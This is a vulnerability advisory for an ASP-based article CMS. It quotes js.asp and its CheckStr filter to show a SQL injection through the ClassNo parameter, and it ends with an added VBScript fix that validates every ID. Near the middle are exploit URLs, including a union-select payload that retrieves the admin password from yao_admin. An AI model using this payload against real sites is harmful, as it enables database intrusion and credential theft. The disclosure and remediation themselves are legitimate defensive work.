Severity: Medium
Vulnerability description:
The vulnerability is in js.asp. Let's look at the source code first.
Code:
If CheckStr(Request("ClassNo")) <> "" then
    ClassNo = split(CheckStr(Request("ClassNo")),"|") ' The variable is read and filtered with CheckStr here, but the filter does not seem to have any effect. It is then split into an array
    on error resume next
    NClassID = LaoYRequest(ClassNo(0))
    NClassID1 = LaoYRequest(ClassNo(1)) ' Array elements 1 and 2 are read and integer-filtered. No vulnerability here
End if
num = LaoYRequest(request.querystring("num")) ' num must be >= 1 here
.......
set rs=server.createObject("Adodb.recordset")
sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"
If NclassID<>"" and NclassID1="" then
    If Yao_MyID(NclassID)="0" then
        SQL=SQL&" and ClassID="&NclassID&""
    else
        MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
        SQL=SQL&" and ClassID in ("&MyID&")"
    End if
elseif NclassID<>"" and NclassID1<>"" then
    MyID = Replace(""&Request("ClassNo")&"","|",",")
    SQL=SQL&" and ClassID in ("&MyID&")" ' This is the problem: ClassNo is written into the query without any further filtering
End if
select case topType
    case "new"
        sql=sql&" order by DateAndTime desc,ID desc"
    case "hot"
        sql=sql&" order by hits desc,ID desc"
    case "IsHot"
        sql=sql&" and IsHot = 1 order by ID desc"
end select
set rs = conn.execute(sql)
if rs.bof and rs.eof then
    str=str+"没有符合条件的文章"
........
-------------------------------
function.asp
Code:
function CheckStr(str)
    CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(13),"")," ","")
    CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
    CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
    CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
end function
Exploit code:
js.asp?num=1&ClassNo=1|1|1[SQL]
js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1 #### code that retrieves the password
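The second branch in js.asp builds the IN (...) list from the raw Request("ClassNo"), while only the first two split elements ever pass through LaoYRequest. As an added example (not code from the original page or from the CMS itself), one way to harden that branch is to validate every |-separated segment as an integer and rebuild the list from the parsed values. SafeIdList and the 9-digit limit are assumptions introduced here.

```vbscript
' Added example, not the CMS's own code.
' SafeIdList is a hypothetical helper; the 9-digit limit is an assumption.
' Returns "1,2,3" for "1|2|3", or "" if any segment is not a plain integer.
Function SafeIdList(raw)
    Dim re, parts, i, p, out
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"    ' digits only; 9 digits always fits CLng
    out = ""
    parts = Split(CStr(raw), "|")
    For i = 0 To UBound(parts)
        p = Trim(parts(i))
        If Not re.Test(p) Then
            SafeIdList = ""        ' reject the whole list, do not try to repair it
            Exit Function
        End If
        If out <> "" Then out = out & ","
        out = out & CStr(CLng(p))  ' re-emit the parsed number, never the raw text
    Next
    SafeIdList = out
End Function

' Body of the second branch in js.asp
' (elseif NclassID<>"" and NclassID1<>"" then), rewritten:
MyID = SafeIdList(Request("ClassNo"))
If MyID <> "" Then
    SQL = SQL & " and ClassID in (" & MyID & ")"
Else
    SQL = SQL & " and 1=0"         ' invalid ClassNo: return no rows
End If
```

Because the list is rebuilt from validated numbers, the check no longer depends on the keyword stripping in CheckStr.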